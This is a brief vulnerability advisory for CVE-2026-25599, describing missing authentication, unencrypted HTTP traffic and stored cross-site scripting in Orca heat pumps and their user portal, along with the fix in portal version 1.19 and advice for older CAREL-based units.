CVE-2026-25599

Vulnerability

Orca heat pumps and the associated user portal are affected by missing authentication, clear-text data transmission, and a lack of input validation [1]. The vulnerability stems from older Orca heat pump devices communicating with the Orca server via unencrypted HTTP over non-secure ports, combined with the absence of input validation on aggregated data, which facilitates stored Cross-Site Scripting (XSS) [1].

Exploitation

An attacker can exploit this by intercepting or impersonating a legitimate heat pump device due to the lack of authentication and encryption [1]. By injecting malicious payloads into the data stream, an attacker can trigger stored XSS within the Orca user portal, potentially leading to the theft of cookies from the pump’s web control interface [1].

Impact

Successful exploitation allows an attacker to inject harmful code directly into the Orca user portal [1]. This can lead to the compromise of user accounts, the exposure of sensitive information, and the execution of unauthorized actions within the portal environment [1].

Mitigation

The stored XSS vulnerability in the Orca user portal has been remediated in version 1.19 [1]. For older Orca heat pump devices that are more than 5 years old and utilize legacy CAREL control units, users are advised to contact Orca support to resolve the underlying authentication and encryption issues [1].